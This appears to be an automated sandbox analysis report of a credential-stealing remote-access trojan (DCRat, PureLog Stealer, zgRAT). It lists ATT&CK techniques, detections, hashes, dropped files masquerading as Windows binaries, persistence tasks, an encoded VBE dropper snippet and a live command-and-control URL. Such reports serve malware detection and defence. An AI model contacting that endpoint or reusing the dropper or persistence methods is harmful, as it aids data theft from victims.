Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	147 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Software Packing	NTDS	231 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	132 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
file.exe	100%	Avira	VBS/Runner.VPG
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\DtJTopEKFGnyRQt.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\xDLjJLJ5P2.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\DtJTopEKFGnyRQt.exe	100%	Avira	HEUR/AGEN.1323342
C:\MsContainer\chainportruntimeCrtMonitor.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323342
C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\Desktop\xcCqXurc.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\gRRDSLOb.log	100%	Avira	TR/AVI.Agent.updqb
C:\MsContainer\sppsvc.exe	100%	Avira	HEUR/AGEN.1323342
C:\Recovery\DtJTopEKFGnyRQt.exe	100%	Joe Sandbox ML
C:\Recovery\DtJTopEKFGnyRQt.exe	100%	Joe Sandbox ML
C:\MsContainer\chainportruntimeCrtMonitor.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\AGJJGYBl.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\RzAxqjrs.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\YmAdlBZw.log	100%	Joe Sandbox ML
C:\MsContainer\sppsvc.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\oyuBnBbv.log	100%	Joe Sandbox ML
C:\MsContainer\chainportruntimeCrtMonitor.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\MsContainer\sppsvc.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Recovery\DtJTopEKFGnyRQt.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\Desktop\AGJJGYBl.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\RzAxqjrs.log	16%	ReversingLabs
C:\Users\user\Desktop\YmAdlBZw.log	16%	ReversingLabs
C:\Users\user\Desktop\eyAdKmjt.log	25%	ReversingLabs
C:\Users\user\Desktop\gMOMTVsR.log	25%	ReversingLabs
C:\Users\user\Desktop\gRRDSLOb.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\gVlLDILN.log	17%	ReversingLabs
C:\Users\user\Desktop\kWdCPgQJ.log	17%	ReversingLabs
C:\Users\user\Desktop\oyuBnBbv.log	29%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\xcCqXurc.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData	0%	Avira URL Cloud	safe
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php	100%	Avira URL Cloud	malware
http://193.3.168.50	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000016.00000002.2406244042.000001BF31918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C7BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 0000001B.00000002.3227892633.0000028D53506000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
http://crl.ver)	svchost.exe, 0000002C.00000002.3379140850.0000021BDCC00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 0000002C.00000003.2407087225.0000021BDCAB0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
https://www.ecosia.org/newtab/	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	false		high
http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData	DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.00000000038CE000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003546000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000365F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 0000002C.00000003.2407087225.0000021BDCB23000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.44.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000016.00000002.2406244042.000001BF31918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C7BE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B538000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301638000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000001C.00000002.3053247232.000001F311488000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000016.00000002.2406244042.000001BF316F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C79C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301411000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.c	powershell.exe, 00000016.00000002.3265075203.000001BF4996E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3280863861.00000181DFE52000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3234116685.00000181DFB96000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chainportruntimeCrtMonitor.exe, 00000005.00000002.2217563085.0000000002D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2406244042.000001BF316F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2389710982.00000181C79C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2378919882.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2390488932.0000028D3B311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2378958553.000001F301411000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003465000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.00000000135E3000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3451965147.0000000013604000.00000004.00000800.00020000.00000000.sdmp, hRUzw4veyD.32.dr	false		high
http://193.3.168.50	DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.0000000003546000.00000004.00000800.00020000.00000000.sdmp, DtJTopEKFGnyRQt.exe, 00000020.00000002.3386767298.000000000365F000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.3.168.50	unknown	Denmark		2107	ARNES-NETAcademicandResearchNetworkofSloveniaSI	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568390
Start date and time:	2024-12-04 15:44:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@37/68@0/2
EGA Information:	Successful, ratio: 40%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target DtJTopEKFGnyRQt.exe, PID 7708 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7932 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7952 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7980 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7988 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
09:45:35	API Interceptor	208x Sleep call for process: powershell.exe modified
09:45:50	API Interceptor	101578x Sleep call for process: DtJTopEKFGnyRQt.exe modified
09:45:51	API Interceptor	2x Sleep call for process: svchost.exe modified
15:45:31	Task Scheduler	Run new task: DtJTopEKFGnyRQt path: "C:\Recovery\DtJTopEKFGnyRQt.exe"
15:45:31	Task Scheduler	Run new task: DtJTopEKFGnyRQtD path: "C:\Recovery\DtJTopEKFGnyRQt.exe"
15:45:31	Task Scheduler	Run new task: sppsvc path: "C:\MsContainer\sppsvc.exe"
15:45:31	Task Scheduler	Run new task: sppsvcs path: "C:\MsContainer\sppsvc.exe"
15:45:31	Task Scheduler	Run new task: WmiPrvSE path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe"
15:45:31	Task Scheduler	Run new task: WmiPrvSEW path: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\WmiPrvSE.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.3.168.50	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ARNES-NETAcademicandResearchNetworkofSloveniaSI	file.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	193.3.168.50
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	193.2.192.103
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	88.200.25.137
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	178.172.103.122
	pjyhwsdgkl.elf	Get hash	malicious	Unknown	Browse	149.62.81.228
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.2.209.204
	x86.elf	Get hash	malicious	Unknown	Browse	109.127.207.201
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	194.249.219.228
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	194.249.74.121
	apep.arm6.elf	Get hash	malicious	Mirai	Browse	109.127.255.139

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AGJJGYBl.log	hjgesadfseawd.exe	Get hash	malicious	DCRat	Browse
	kyhjasehs.exe	Get hash	malicious	DCRat	Browse
	adjthjawdth.exe	Get hash	malicious	DCRat	Browse
	based.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	rvNK8fDa0k.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	RustChecker.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse
	T0jSGXdxX5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	main.exe	Get hash	malicious	DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT	Browse
	file_1443.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	lsass.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\MsContainer\0a1fd5f707cd16

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	224
Entropy (8bit):	5.728220731503569
Encrypted:	false
SSDEEP:	6:z6NOVjhWEJcAEQzJ7TUi6hcC/hBr4ETxXOH0djm:z6NIjQMcAEQzRicC/hB8itO0jm
MD5:	9229550276AF276A9FCD665F996D581C
SHA1:	CCFD3192DBEE442D802FA276908456903A1D4458
SHA-256:	DA4CD9C91E2129770762FF0D781EDEF2E1D4F16AD227044DA57C694A3F3D9761
SHA-512:	760012DFF7471C710A31214C49184C23DACEE219B82B5C080016D412B0DA6DA1DEFD39349AF06398000903ED7C01FA81559AA65461EF23A9166544B664130599
Malicious:	false
Preview:	nCtPNu2ndt6U2NTJxi9gmkTG7yC6XtMyFm9y1lvGyUjxFO4DVE6ktNkDsnSZs5QthHPPNfSLx2rSBfBs39lSxlF1C6FOTVY3DzQ79oz0wvx0fSBNljgsU765CXNRZE1bdyOLODtOKvgByOVt52mtzqiG3U5lbiar3VWrE08h0Riia4HyCdWhbImxPHS4IHxlUzHd1opE3E2iIAp8NGj7M3Pvtjb6iEYt

C:\MsContainer\chainportruntimeCrtMonitor.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1978368
Entropy (8bit):	7.559518015543571
Encrypted:	false
SSDEEP:	24576:dTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTvATErI:dEJculsz5u4SlYrWL06YZ+/DQvA4
MD5:	A961FFE1FAEECF8AD553D4792052498C
SHA1:	1A8DA2A519AC6D60A3AF0E7BEF9D210BF9F00625
SHA-256:	BF7C89BB02A84441CBF8A99D90D58203325AEB848CEA98A62DBE9A39BC61308F
SHA-512:	873BB592136978E3A6D514EB8DAE204E96F42C36BED28A274EF84666A0FC4D82A4F4DAD1119E3FA754C3E6E4EEAE8AC4040DD1BA3E3F6D5D9881CF2177F96C81
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................(...........G... ...`....@.. ....................................@.................................@G..K....`..p............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...p....`.....................@....reloc..............................@..B................pG......H.......L...<.......o........m...F.......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....8........0.......... ........8........E........P..._...............8....~....(G... .... .... ....s....~....(K....... ....~r...{....9....& ....8....8N... ....8....~....9.... ....~r...{....:f...& ....8[......... ....8K...r...ps....z*....~....(O...~....(S... ....?...

C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	198
Entropy (8bit):	5.7021986701870535
Encrypted:	false
SSDEEP:	6:GjkgwqK+NkLzWbH1xdyrFnBaORbM5nCk21fp2ku:GiMCzWL1xdyhBaORbQCZ1E7
MD5:	ABC047663F5A5163FF7447EE9B417FAD
SHA1:	1E65B28464025176B1DF8A328DC123437D167B82
SHA-256:	741D7B538B1A9E4D1C0AA414CFD52704974005CCB1C15496F82D4ACF21432A7F
SHA-512:	FAB046F932C9C3CA7F836E1706975EDB0C2DAF65CE343C8964BEC6AB97E877A9C06F5171B70118C39986585073255C7A5D362EF6439742CB0346EDEF09810DC0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^rQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFq!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z\kZKxYmk.nDJz"(MS5XltR(CYr~PZS~0mVk+LjYAAA==^#~@.

C:\MsContainer\sppsvc.exe

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1978368
Entropy (8bit):	7.559518015543571
Encrypted:	false
SSDEEP:	24576:dTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTvATErI:dEJculsz5u4SlYrWL06YZ+/DQvA4
MD5:	A961FFE1FAEECF8AD553D4792052498C
SHA1:	1A8DA2A519AC6D60A3AF0E7BEF9D210BF9F00625
SHA-256:	BF7C89BB02A84441CBF8A99D90D58203325AEB848CEA98A62DBE9A39BC61308F
SHA-512:	873BB592136978E3A6D514EB8DAE204E96F42C36BED28A274EF84666A0FC4D82A4F4DAD1119E3FA754C3E6E4EEAE8AC4040DD1BA3E3F6D5D9881CF2177F96C81
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\sppsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\sppsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\sppsvc.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\sppsvc.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................(...........G... ...`....@.. ....................................@.................................@G..K....`..p............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...p....`.....................@....reloc..............................@..B................pG......H.......L...<.......o........m...F.......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....8........0.......... ........8........E........P..._...............8....~....(G... .... .... ....s....~....(K....... ....~r...{....9....& ....8....8N... ....8....~....9.... ....~r...{....:f...& ....8[......... ....8K...r...ps....z*....~....(O...~....(S... ....?...

C:\MsContainer\zXrLq55h.bat

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	5.065810500204247
Encrypted:	false
SSDEEP:	3:Qv1tbAjmXFf2hKHAXPlmXQlOKfb4hR:QN1AjUf2hKglmXQ4bhR
MD5:	D937B4F89C4DEA90F63C8943F4DE7FBD
SHA1:	A84575193A53072FB72AE7698320DA6AAC2076AD
SHA-256:	EAC9177E30044818CFB3CD3ED442D93253F661B17B8352D2A001063E37AB54E2
SHA-512:	ADF8D4A650E3B9CA50DD47A4CBF8A614B068A7CA6CA200D7DBEC752C059B22FA37E5D6AE6FBB85EE50F6D00ABFE9552B53BB1F99F0D9503F82509822DAC213E9
Malicious:	false
Preview:	%TWmDHiMEH%%JfHUVmhyOscQB%..%icIbFmXyx%"C:\MsContainer/chainportruntimeCrtMonitor.exe"%yzOY%

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\24dbde2999530e

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with very long lines (681), with no line terminators
Category:	dropped
Size (bytes):	681
Entropy (8bit):	5.878780681325418
Encrypted:	false
SSDEEP:	12:86IJ8gjWcc48bWfydSRUmUtQK5JNhSnvInX377hRvRpUytqATW1woxQGTn0iPvfe:86gjWq8buSSRtUFJNhSvIPvnUYqATkwd
MD5:	B5B9B3C94D82492A995738A1DE2CEBD5
SHA1:	8AF98B77D6EE3A84F0C765FE60F51A14AB8DB1E3
SHA-256:	44151EBA33C05D2928568B8D3CFAE22492449CB8CC967FDC8691E5444A0E0819
